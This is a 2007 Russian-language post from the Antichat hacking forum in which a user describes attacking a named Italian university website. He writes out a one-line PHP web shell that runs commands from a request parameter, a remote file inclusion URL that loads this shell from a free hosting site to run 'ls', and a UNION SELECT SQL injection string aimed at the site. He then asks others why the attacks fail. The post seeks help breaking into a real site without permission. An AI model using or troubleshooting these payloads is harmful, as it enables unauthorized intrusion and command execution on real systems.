ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу PHP & SQL inj
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

PHP & SQL inj
  #1  
Старый 25.09.2007, 17:04
Аватар для nikoTM
nikoTM
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723

Репутация: 22
По умолчанию PHP & SQL inj
привет всем..люди у мя такая проблема на сайте
Цитата:
http://sicurezza.uniss.it/
есть такое index.php?p= удаленный инклудинг...но по неизвестным мне причинам он не поддерживает например такое
PHP код:
<pre><? @system($_REQUEST['c']); ?></pre>
(который я кинул в txt и впихнул в НАРОД). В результате такая страница http://ихсайт/?p=http://что-то.narod.ru/file.txt?c=ls не катит. Но что самое удивидельное когда file.txt такой
PHP код:
<? echo 'a'?>
ссылка катит..вот не пойму с чего бы?

а про SQL inj там еще есть такое
Цитата:
http://sicurezza.uniss.it/index.php?h=1&cat=-1'A
но не смог понята почиму он не принимает сам запрос такой результ
You have an error in your SQL syntax near 'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13/* ORDER BY data DESC ' at line 1
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ